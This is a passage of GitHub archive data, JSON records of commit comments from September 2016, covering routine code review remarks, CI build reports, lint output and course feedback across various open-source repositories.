<https://github.com/totalgood/keras/commit/232f77003f0357d3de31a0db0b1ac9c532dfb3ce#commitcomment-19136240>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAR390qYOH1xA5LrG1qxtrRjG-Sd_dSvks5qsuBqgaJpZM4KESME>\n> .\n>\n"}},"created_at":"2016-09-22T21:05:17Z"}
{"id":"4605097480","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19136928,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-22T21:06:07Z","updated_at":"2016-09-22T21:06:07Z","body":"I have download & compile XglyphController and XGlyphiOS but doesn't change anything 😢"}},"created_at":"2016-09-22T21:06:07Z"}
{"id":"4605097798","type":"CommitCommentEvent","actor":{"login":"jhallard"},"repo":{"name":"CamioCam/rtsp"},"payload":{"comment":{"id":19136929,"position":5,"line":24,"path":"cameras/paths.csv","commit_id":"3f099b7b2a99a46ba2673f21f6aad35e8fea9b28","created_at":"2016-09-22T21:06:11Z","updated_at":"2016-09-22T21:06:11Z","body":"done c1692182d27ca5ecd19fbf0c0967b060bef90162"}},"created_at":"2016-09-22T21:06:11Z"}
{"id":"4605098950","type":"CommitCommentEvent","actor":{"login":"DPUkyle"},"repo":{"name":"gosu-lang/gosu-lang"},"payload":{"comment":{"id":19136930,"position":4,"line":169,"path":"gosu-core/src/main/java/gw/internal/gosu/parser/ClassPath.java","commit_id":"0030122542ac5806c8f2cdc05af40994cf4eb943","created_at":"2016-09-22T21:06:25Z","updated_at":"2016-09-22T21:06:25Z","body":"Hi @rsmckinney don't you like muh code?"}},"created_at":"2016-09-22T21:06:25Z"}
{"id":"4605100511","type":"CommitCommentEvent","actor":{"login":"matthewhorridge"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19136934,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:06:42Z","updated_at":"2016-09-22T21:06:42Z","body":"I need to double check that.  I'm actually not sure it's really required at runtime (or just compile time).  I need to check that too."}},"created_at":"2016-09-22T21:06:42Z"}
{"id":"4605102736","type":"CommitCommentEvent","actor":{"login":"AKonia"},"repo":{"name":"AKonia/TK3_22092016"},"payload":{"comment":{"id":19136939,"position":null,"line":null,"path":null,"commit_id":"cbc6a34214a84e55986645b2940a23a82523f05e","created_at":"2016-09-22T21:07:07Z","updated_at":"2016-09-22T21:07:07Z","body":"Создано хранилище с списком игнора"}},"created_at":"2016-09-22T21:07:07Z"}
{"id":"4605104508","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19136941,"position":null,"line":null,"path":null,"commit_id":"5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd","created_at":"2016-09-22T21:07:27Z","updated_at":"2016-09-22T21:07:27Z","body":"fix_gcc48_ICE (macumber) - x86_64-MacOS-10.9-clang: OK (2313 of 2328 tests passed, 554 test warnings)\n\n * 569 tests had: AUD diffs.\n * 36 tests had: ERR diffs.\n * 14 tests had: Table big diffs.\n * 38 tests had: EIO diffs.\n * 9 tests had: ESO small diffs.\n * 8 tests had: ESO big diffs.\n * 2 tests had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 13 tests had: RDD diffs.\n * 3 tests had: MTD diffs.\n * 4 tests had: MTR big diffs.\n * 1 test had: MDD diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n * 3 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.36%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T21:07:27Z"}
{"id":"4605105072","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19136943,"position":null,"line":null,"path":null,"commit_id":"0844933eb096739e6108ed8a7e834012f2355b71","created_at":"2016-09-22T21:07:33Z","updated_at":"2016-09-22T21:07:33Z","body":"Ok the serial and udp should be working. Im not 100% about send and receive. They work but the concern is the integration with the uin8_t* buffers if any issues come to light."}},"created_at":"2016-09-22T21:07:33Z"}
{"id":"4605105338","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19136945,"position":null,"line":null,"path":null,"commit_id":"db05cecbb722cd0903db10a70a39a154034ae893","created_at":"2016-09-22T21:07:36Z","updated_at":"2016-09-22T21:07:36Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 259](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1221&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **SUCCESS**\nSummary: Running Build time: 00:27:36"}},"created_at":"2016-09-22T21:07:36Z"}
{"id":"4605109467","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19136958,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:08:24Z","updated_at":"2016-09-22T21:08:24Z","body":"If it's only for annotations, I think it is not needed for runtime (and hence in manifest)."}},"created_at":"2016-09-22T21:08:24Z"}
{"id":"4605117763","type":"CommitCommentEvent","actor":{"login":"olmobrutall"},"repo":{"name":"signumsoftware/extensions"},"payload":{"comment":{"id":19136968,"position":null,"line":null,"path":null,"commit_id":"29ac95cf2eb51da5a8ec4aea9d23cda0ce678d26","created_at":"2016-09-22T21:09:38Z","updated_at":"2016-09-22T21:09:38Z","body":"👍🏼👍🏼👍🏼😢😚😜🤗"}},"created_at":"2016-09-22T21:09:38Z"}
{"id":"4605117927","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19136970,"position":null,"line":null,"path":null,"commit_id":"f967d0bfaa3a76dfe4c544c9e0fdd1fc508b7625","created_at":"2016-09-22T21:09:40Z","updated_at":"2016-09-22T21:09:40Z","body":"Magic :) Nah I just made a nice little script that attempts to find all the borders and their ranks. The numbers follow a somewhat predictable pattern so it's possible to find them all, it's just that they're not in order and somewhat random. Just run the code on a users profile and it will make about 400 requests (I hope i'm not the one DDoS'ing Blizzard lol) trying every possible url and it adds them all to the bottom of the page with the ID. Then you gotta figure out what rank they are\r\n\r\n![image](https://cloud.githubusercontent.com/assets/6258213/18766234/965410ee-815c-11e6-944f-bb24a11b6de6.png)\r\n\r\nhttps://github.com/Js41637/Website-Scripts/blob/master/Random/Overwatch%20Portrait%20Scraper.js\r\n"}},"created_at":"2016-09-22T21:09:40Z"}
{"id":"4605118079","type":"CommitCommentEvent","actor":{"login":"matthewhorridge"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19136971,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:09:42Z","updated_at":"2016-09-22T21:09:42Z","body":"These annotation have a runtime retention though, so I don't think that's correct."}},"created_at":"2016-09-22T21:09:42Z"}
{"id":"4605127063","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19136986,"position":null,"line":null,"path":null,"commit_id":"0844933eb096739e6108ed8a7e834012f2355b71","created_at":"2016-09-22T21:11:20Z","updated_at":"2016-09-22T21:11:20Z","body":"We'll see what happens when things don't go as planned. We have to try it out though. Unless you want me to build some test cases..."}},"created_at":"2016-09-22T21:11:20Z"}
{"id":"4605127898","type":"CommitCommentEvent","actor":{"login":"cxhernandez"},"repo":{"name":"msmbuilder/mdentropy"},"payload":{"comment":{"id":19136989,"position":null,"line":null,"path":null,"commit_id":"63441b15cf91839f7493bd77d824bf1337a4ff1e","created_at":"2016-09-22T21:11:30Z","updated_at":"2016-09-22T21:11:30Z","body":"Ah, this is to go along with the k-Nearest Neighbors estimator (where `n_bins` becomes `k`). For Grassberger, you should be fine with 30 bins, but, in the `dev` version, it might be worth setting `n_bins` to `None` so that the number of bins are automatically selected for you using Doane's Formula (I'm looking into implementing more of these sorts of tools)."}},"created_at":"2016-09-22T21:11:30Z"}
{"id":"4605133550","type":"CommitCommentEvent","actor":{"login":"aevensen"},"repo":{"name":"blakev/big-data-2016"},"payload":{"comment":{"id":19137001,"position":null,"line":null,"path":null,"commit_id":"d726c41e5f0bc8492f2da18f6bba534443405c13","created_at":"2016-09-22T21:12:36Z","updated_at":"2016-09-22T21:12:36Z","body":"Put the wrong file up.  This is a copy of the original without the scorecard data.  The file is too big with the collegescorecard file."}},"created_at":"2016-09-22T21:12:36Z"}
{"id":"4605136026","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19137006,"position":null,"line":null,"path":null,"commit_id":"0844933eb096739e6108ed8a7e834012f2355b71","created_at":"2016-09-22T21:13:06Z","updated_at":"2016-09-22T21:13:06Z","body":"No i already did that "}},"created_at":"2016-09-22T21:13:06Z"}
{"id":"4605137432","type":"CommitCommentEvent","actor":{"login":"Js41637"},"repo":{"name":"SunDwarf/OWAPI"},"payload":{"comment":{"id":19137010,"position":null,"line":null,"path":null,"commit_id":"cafb5e872dc0756c8b2f4d2c3551a74ac40df48f","created_at":"2016-09-22T21:13:21Z","updated_at":"2016-09-22T21:13:21Z","body":"nice merge\r\n"}},"created_at":"2016-09-22T21:13:21Z"}
{"id":"4605137431","type":"CommitCommentEvent","actor":{"login":"rosttver"},"repo":{"name":"rosttver/oldFacebookPageRemake"},"payload":{"comment":{"id":19137011,"position":null,"line":null,"path":null,"commit_id":"a3eb1ce5629e9ffadf83f479d662e923d44c3db2","created_at":"2016-09-22T21:13:22Z","updated_at":"2016-09-22T21:13:22Z","body":"Initial commit"}},"created_at":"2016-09-22T21:13:22Z"}
{"id":"4605137751","type":"CommitCommentEvent","actor":{"login":"rubo77"},"repo":{"name":"freifunk-kiel/ffmap-backend"},"payload":{"comment":{"id":19137012,"position":2,"line":2,"path":"mkmap.sh","commit_id":"aba5dd98a8757e7b114d973a246248fcdd619855","created_at":"2016-09-22T21:13:25Z","updated_at":"2016-09-22T21:13:25Z","body":"ich verstehe, ist falsch, weil grep sich selbst nicht immer mit findet im ps.\r\n\r\naber `-gt 2` ist dann doch auch schon falsch, oder?\r\n\r\nvielleicht so:\r\n\r\n    if [ $(pgrep -c $(basename $0)) -gt 0 ];\r\n\r\n"}},"created_at":"2016-09-22T21:13:25Z"}
{"id":"4605138045","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137013,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:13:28Z","updated_at":"2016-09-22T21:13:28Z","body":"OK, I see. Annotations generate import declarations for this package in other bundles (protege-editor-core). \r\nStill not clear to me how this package dependency is resolved at runtime.\r\nIt will probably be easiest just to copy jsr305 to bundles."}},"created_at":"2016-09-22T21:13:28Z"}
{"id":"4605138298","type":"CommitCommentEvent","actor":{"login":"cainelli"},"repo":{"name":"inova-tecnologias/jenova"},"payload":{"comment":{"id":19137014,"position":null,"line":null,"path":null,"commit_id":"87e49acc1eb0bc8561716a11e4490eb8b8bee1b5","created_at":"2016-09-22T21:13:30Z","updated_at":"2016-09-22T21:13:30Z","body":"Fixed #25 instead"}},"created_at":"2016-09-22T21:13:30Z"}
{"id":"4605139096","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19137016,"position":null,"line":null,"path":null,"commit_id":"0844933eb096739e6108ed8a7e834012f2355b71","created_at":"2016-09-22T21:13:39Z","updated_at":"2016-09-22T21:13:39Z","body":"Also since you want to make threads into a C++, i might as well make them easier to use... I'll be working on that as well."}},"created_at":"2016-09-22T21:13:39Z"}
{"id":"4605140013","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19137020,"position":76,"line":63,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T21:13:50Z","updated_at":"2016-09-22T21:13:50Z","body":"Hai ragione, mi piace molto l'ultima che hai messo :D"}},"created_at":"2016-09-22T21:13:50Z"}
{"id":"4605140919","type":"CommitCommentEvent","actor":{"login":"matthewhorridge"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137021,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:14:02Z","updated_at":"2016-09-22T21:14:02Z","body":"> It will probably be easiest just to copy jsr305 to bundles.\r\n\r\nYes, absolutely.  I'll add an issue for this so I don't forget."}},"created_at":"2016-09-22T21:14:02Z"}
{"id":"4605141190","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19137022,"position":null,"line":null,"path":null,"commit_id":"d573bc3834d47740730b26dbe532837fb0625376","created_at":"2016-09-22T21:14:06Z","updated_at":"2016-09-22T21:14:06Z","body":"++"}},"created_at":"2016-09-22T21:14:06Z"}
{"id":"4605141843","type":"CommitCommentEvent","actor":{"login":"PierreBesson"},"repo":{"name":"pascalgrimaud/generator-jhipster"},"payload":{"comment":{"id":19137024,"position":3,"line":3,"path":"travis/samples/app-microservice-consul/.yo-rc.json","commit_id":"0193de90dedb8510a6204d5122214f08e00f6392","created_at":"2016-09-22T21:14:13Z","updated_at":"2016-09-22T21:14:13Z","body":"I'm so dumb !!!"}},"created_at":"2016-09-22T21:14:13Z"}
{"id":"4605142825","type":"CommitCommentEvent","actor":{"login":"joshilly13"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19137026,"position":null,"line":null,"path":null,"commit_id":"b6f0afa6dc92c266313cb32eb7d5bdada2683eec","created_at":"2016-09-22T21:14:24Z","updated_at":"2016-09-22T21:14:24Z","body":"Hi ,I can't farm pokestop with greatballs and ultraballs, only pokeballs..."}},"created_at":"2016-09-22T21:14:24Z"}
{"id":"4605143059","type":"CommitCommentEvent","actor":{"login":"gfsoileau"},"repo":{"name":"JonathanToro/dsp"},"payload":{"comment":{"id":19137027,"position":null,"line":null,"path":null,"commit_id":"f258a15f8f53e2fea31018030ddf13a37647d04f","created_at":"2016-09-22T21:14:27Z","updated_at":"2016-09-22T21:14:27Z","body":"RE: 05a-python.md \r\nHello @JonathanToro \r\ncc: @reshamametis @aramnath @julialintern \r\n\r\nGood job in completing the Python I section!  👍 \r\nAnd great job with the markdown!\r\n\r\nA link to solutions will be sent out soon.\r\n\r\nGeneral Comments\r\n\r\nQ2 Lookup speed: lists vs. sets\r\nIt's faster to lookup in sets compared to lists. However, the fact that sets do not have duplicate elements is NOT the reason. The real distinction is that sets are implemented using hash functions, which grants them constant lookup time O(1). Whereas in lists, you have to iterate through the whole list using the indices, and that is linear time operation O(N).\r\n\r\nIf you are not familiar with the big O notation, it's a great subject to review, and here is a nice cheatsheet: \r\nhttp://bigocheatsheet.com/\r\n\r\nDoc strings should aways come right after the function definition. \r\n\r\nUsing what we learned about filter and lambda, match_ends can be written as :\r\nitems = list(filter(lambda x: len(x) >= 2 and x[0] == x[-1], words))\r\n\r\n"}},"created_at":"2016-09-22T21:14:27Z"}
{"id":"4605143632","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19137030,"position":null,"line":null,"path":null,"commit_id":"fab51784acdb5484b08d4dcf9f5674dcd15dc87c","created_at":"2016-09-22T21:14:34Z","updated_at":"2016-09-22T21:14:34Z","body":"Thanks for upgrading it"}},"created_at":"2016-09-22T21:14:34Z"}
{"id":"4605145378","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19137033,"position":null,"line":null,"path":null,"commit_id":"436388d85ce6eb637d395727a3027f986a2a3d6c","created_at":"2016-09-22T21:14:55Z","updated_at":"2016-09-22T21:14:55Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 432](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1222&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-22T21:14:55Z"}
{"id":"4605148747","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19137036,"position":null,"line":null,"path":null,"commit_id":"945f367b3ab4626d8d205b7806373fe47e969636","created_at":"2016-09-22T21:15:34Z","updated_at":"2016-09-22T21:15:34Z","body":"Atleast better than the old mess +1"}},"created_at":"2016-09-22T21:15:34Z"}
{"id":"4605149659","type":"CommitCommentEvent","actor":{"login":"1033Forest"},"repo":{"name":"stepmania/stepmania"},"payload":{"comment":{"id":19137038,"position":null,"line":null,"path":null,"commit_id":"5e2e1e9a704631751d232b9f9735fd8576bae551","created_at":"2016-09-22T21:15:45Z","updated_at":"2016-09-22T21:15:45Z","body":"So it turns out, that clever usage of the mod system can change the quantization of a note..."}},"created_at":"2016-09-22T21:15:45Z"}
{"id":"4605150238","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137039,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:15:53Z","updated_at":"2016-09-22T21:15:53Z","body":"OK, I'll do it this way in my branch."}},"created_at":"2016-09-22T21:15:53Z"}
{"id":"4605152674","type":"CommitCommentEvent","actor":{"login":"Borlea"},"repo":{"name":"Borlea/EchoPet"},"payload":{"comment":{"id":19137045,"position":null,"line":null,"path":null,"commit_id":"9e287d8909ec23f01e6b09762fb158b26d20a6fc","created_at":"2016-09-22T21:16:18Z","updated_at":"2016-09-22T21:16:18Z","body":"oops O_o"}},"created_at":"2016-09-22T21:16:18Z"}
{"id":"4605154628","type":"CommitCommentEvent","actor":{"login":"matthewhorridge"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137051,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:16:39Z","updated_at":"2016-09-22T21:16:39Z","body":"Feel free to issue a pull request.  I'll try not to be too tardy in getting to it :) "}},"created_at":"2016-09-22T21:16:39Z"}
{"id":"4605155036","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19137054,"position":null,"line":null,"path":null,"commit_id":"436388d85ce6eb637d395727a3027f986a2a3d6c","created_at":"2016-09-22T21:16:44Z","updated_at":"2016-09-22T21:16:44Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 432](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1222&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:48"}},"created_at":"2016-09-22T21:16:44Z"}
{"id":"4605155287","type":"CommitCommentEvent","actor":{"login":"georgeutsin"},"repo":{"name":"ethan-hardy/george-atom"},"payload":{"comment":{"id":19137055,"position":null,"line":null,"path":null,"commit_id":"2e1aa508bd52d2c0c3db4065c71318b30a51f62b","created_at":"2016-09-22T21:16:47Z","updated_at":"2016-09-22T21:16:47Z","body":"LOOL ty for answers"}},"created_at":"2016-09-22T21:16:47Z"}
{"id":"4605161009","type":"CommitCommentEvent","actor":{"login":"zerocrates"},"repo":{"name":"omeka/Omeka"},"payload":{"comment":{"id":19137071,"position":null,"line":null,"path":null,"commit_id":"41b27de12e4007db0c809664a8b2491a98972c25","created_at":"2016-09-22T21:17:51Z","updated_at":"2016-09-22T21:17:51Z","body":"Do we want to do the same to the other uses of red-bg.jpg?"}},"created_at":"2016-09-22T21:17:51Z"}
{"id":"4605166331","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137079,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:18:51Z","updated_at":"2016-09-22T21:18:51Z","body":"Well, but then first you would need to merge in my current pull request. ;)"}},"created_at":"2016-09-22T21:18:51Z"}
{"id":"4605166559","type":"CommitCommentEvent","actor":{"login":"adammurdoch"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19137080,"position":null,"line":null,"path":null,"commit_id":"f2639179372eba1ebe9de885939b02d6160a1a20","created_at":"2016-09-22T21:18:53Z","updated_at":"2016-09-22T21:18:53Z","body":"Correct. I'll be changing that soon, first I'm reviewing all the usages of `useCache()` to make sure they honour the new contract.\r\n\r\nSomething I also want to fix as part of this is to make the task history object 100% immutable, as we don't yet guarantee that the input property values that we hold in the cache are immutable."}},"created_at":"2016-09-22T21:18:53Z"}
{"id":"4605167335","type":"CommitCommentEvent","actor":{"login":"alexh-name"},"repo":{"name":"Ypnose/ahrf"},"payload":{"comment":{"id":19137083,"position":null,"line":null,"path":null,"commit_id":"400f058fa8a07b4a70f6f6da678a0149c9f2318d","created_at":"2016-09-22T21:19:03Z","updated_at":"2016-09-22T21:19:03Z","body":"nice!"}},"created_at":"2016-09-22T21:19:03Z"}
{"id":"4605168531","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19137084,"position":21,"line":4897,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"744428449c3e6fdc3fb2e67a045f552de106cc7a","created_at":"2016-09-22T21:19:16Z","updated_at":"2016-09-22T21:19:16Z","body":"Nur in wenigen Wendungen, oder? Dann wäre es vielleicht besser, diese konkreten Wendungen in disambiguation.xml auszulisten?"}},"created_at":"2016-09-22T21:19:16Z"}
{"id":"4605168610","type":"CommitCommentEvent","actor":{"login":"pedro-mendonca"},"repo":{"name":"WordImpress/WP-Rollback"},"payload":{"comment":{"id":19137085,"position":13,"line":35,"path":"includes/rollback-action.php","commit_id":"c46a4124166fd4d7620f5102494c07323e960dcd","created_at":"2016-09-22T21:19:17Z","updated_at":"2016-09-22T21:19:17Z","body":"Hi @DevinWalker,\r\nDidn't you mean *This rollback request is missing a proper query string.*?"}},"created_at":"2016-09-22T21:19:17Z"}
{"id":"4605172318","type":"CommitCommentEvent","actor":{"login":"matthewhorridge"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137096,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:19:59Z","updated_at":"2016-09-22T21:19:59Z","body":"Hah!  I was looking at that an hour ago funnily enough.  Please can you double check it, because I've a feeling that (since looking at it) these jsr305 changes have cocked things up."}},"created_at":"2016-09-22T21:19:59Z"}
{"id":"4605172976","type":"CommitCommentEvent","actor":{"login":"contrapost"},"repo":{"name":"contrapost/c_experiments"},"payload":{"comment":{"id":19137100,"position":28,"line":28,"path":"lec4/ex3.c","commit_id":"5ee5f751a9ae494f17fe48aee2227a36b98ad61d","created_at":"2016-09-22T21:20:07Z","updated_at":"2016-09-22T21:20:07Z","body":"remove `size *=2` or `size++`"}},"created_at":"2016-09-22T21:20:07Z"}
{"id":"4605176186","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19137109,"position":null,"line":null,"path":null,"commit_id":"72bd1eac3e3b7784a10080263c4257d5c7955092","created_at":"2016-09-22T21:20:42Z","updated_at":"2016-09-22T21:20:42Z","body":"[inst/site/create_table.R:5:12:](https://github.com/seninp-bioinfo/MetaComp/blob/72bd1eac3e3b7784a10080263c4257d5c7955092/inst/site/create_table.R#L5) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​data_dt <- as.data.table(data_df)\n           ^~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_to_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/72bd1eac3e3b7784a10080263c4257d5c7955092/tests/testthat/test_convert_to_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_to_otu_table.R:26:2:](https://github.com/seninp-bioinfo/MetaComp/blob/72bd1eac3e3b7784a10080263c4257d5c7955092/tests/testthat/test_convert_to_otu_table.R#L26) *style:* **Commented code should be removed.**\n```r\n​#expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/nonexistantfile.txt\", \"class\"), throws_error())\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_to_otu_table.R:27:1:](https://github.com/seninp-bioinfo/MetaComp/blob/72bd1eac3e3b7784a10080263c4257d5c7955092/tests/testthat/test_convert_to_otu_table.R#L27) *style:* **lines should not be more than 100 characters.**\n```r\n​expect_that(convert_to_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-22T21:20:42Z"}
{"id":"4605177359","type":"CommitCommentEvent","actor":{"login":"stuartskelton"},"repo":{"name":"stevan/p5-App-Critique"},"payload":{"comment":{"id":19137113,"position":null,"line":null,"path":null,"commit_id":"92748f23288174eece0bcad0058315c39f67ac94","created_at":"2016-09-22T21:20:55Z","updated_at":"2016-09-22T21:20:55Z","body":"opps sorry."}},"created_at":"2016-09-22T21:20:55Z"}
{"id":"4605183271","type":"CommitCommentEvent","actor":{"login":"ykazakov"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137134,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:21:58Z","updated_at":"2016-09-22T21:21:58Z","body":"Well, I have just rebased & resolved the conflicts and while it works fine from maven, I have these nasty manifest errors in Eclipse."}},"created_at":"2016-09-22T21:21:58Z"}
{"id":"4605184488","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19137137,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-22T21:22:12Z","updated_at":"2016-09-22T21:22:12Z","body":"Please add this change to CHANGES.md. Also, could you add a date to the README_en_GB.txt to make very clear which version this is?"}},"created_at":"2016-09-22T21:22:12Z"}
{"id":"4605184765","type":"CommitCommentEvent","actor":{"login":"juxbox"},"repo":{"name":"ErikMinekus/traktor-kontrol-screens"},"payload":{"comment":{"id":19137139,"position":null,"line":null,"path":null,"commit_id":"43d24f8935e17cff54c02f3a742a8d4d94ba0d51","created_at":"2016-09-22T21:22:15Z","updated_at":"2016-09-22T21:22:15Z","body":"Very Thanks working good job erik. \r\nplease make me traktor s5 browser only cover-title-bpm-key remove artist "}},"created_at":"2016-09-22T21:22:15Z"}
{"id":"4605190232","type":"CommitCommentEvent","actor":{"login":"NoahRGuy"},"repo":{"name":"NoahRGuy/phase-0-tracks"},"payload":{"comment":{"id":19137148,"position":null,"line":null,"path":null,"commit_id":"fdf6c1179a97d4a7282fdfe7f347cc975dcbcc38","created_at":"2016-09-22T21:23:21Z","updated_at":"2016-09-22T21:23:21Z","body":"@katekourbatova for reference"}},"created_at":"2016-09-22T21:23:21Z"}
{"id":"4605194073","type":"CommitCommentEvent","actor":{"login":"Phoestia"},"repo":{"name":"Phoestia/Learning-Python"},"payload":{"comment":{"id":19137161,"position":null,"line":null,"path":null,"commit_id":"a3b4a977991375d96d30a62efa4661dd0f99d3ff","created_at":"2016-09-22T21:24:04Z","updated_at":"2016-09-22T21:24:04Z","body":"9.2 Exercise 3"}},"created_at":"2016-09-22T21:24:04Z"}
{"id":"4605196568","type":"CommitCommentEvent","actor":{"login":"matthewhorridge"},"repo":{"name":"protegeproject/protege"},"payload":{"comment":{"id":19137164,"position":null,"line":null,"path":null,"commit_id":"c25c20d3209b0b0d11984942274026f3d0db2349","created_at":"2016-09-22T21:24:32Z","updated_at":"2016-09-22T21:24:32Z","body":"o.k. so I'll merge your pull request then"}},"created_at":"2016-09-22T21:24:32Z"}
{"id":"4605197360","type":"CommitCommentEvent","actor":{"login":"alexh-name"},"repo":{"name":"Ypnose/ahrf"},"payload":{"comment":{"id":19137167,"position":null,"line":null,"path":null,"commit_id":"99d5691c6f36c62699b89a62db09ac29f852d4b2","created_at":"2016-09-22T21:24:41Z","updated_at":"2016-09-22T21:24:41Z","body":"This is super useful for implementing bold and italic just like your commit for code inside paragraphs (8600325). Thanks!"}},"created_at":"2016-09-22T21:24:41Z"}
